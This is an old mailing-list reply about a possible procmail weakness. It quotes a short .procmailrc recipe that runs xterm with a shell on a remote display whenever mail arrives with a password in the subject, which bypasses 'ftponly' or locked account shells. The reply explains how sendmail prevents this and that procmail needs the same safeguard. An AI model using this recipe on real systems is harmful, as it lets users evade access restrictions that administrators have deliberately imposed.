Re: procmail

[Kari.Hurtta () dionysos fmi fi (Kari E. Hurtta)]

Neil Soveran-Charley kirjoittaa:
> > hi there ,
> > I just heard from a friend that there is a bug in procmail
> > which allows anyone to open an xterm window from any
> > m/c .has anyone heard of  this if so can u post the details
> > and the xploit
> > thanx
> > danny
>
>    NB: This isn't a 'hack an account' hole. However if you have
> 'ftponly' accounts, i.e. people grab email via pop, but also have ftp
> access for maintaingin their web pages, with a 'shell' that prints a
> message and exits, then the following is possible to work around such
> security...
>
>    I think there may well be such an exploit. I'd guess it is simply
>  something like:
>
> (.procmailrc contents)
>
> :0 Hc
> * ^Subject:.*APassword
> /usr/bin/X11/xterm -display <some display> -e <a shell>
>
> (end .procmailrc)
>
>   Then email yourself with something with the password in the subject
> line and an xterm gets popped up on the display, running the given
> shell, thus bypassing any 'locked account' or 'ftponly' shells...
>
>   I'm sure procmail MUST have some security feature to disallow this
> sort of thing? But I could be wrong, and haven't checked the manual
> pages yet.

Sendmail disallows this short things by not allowing pipes in .forward
if user have not valid shell (listed in /etc/shells). Yes, if you
use procmail as local delivery agent, then you need same kind mechanism
in procmail also (if it allows piping mail to programs).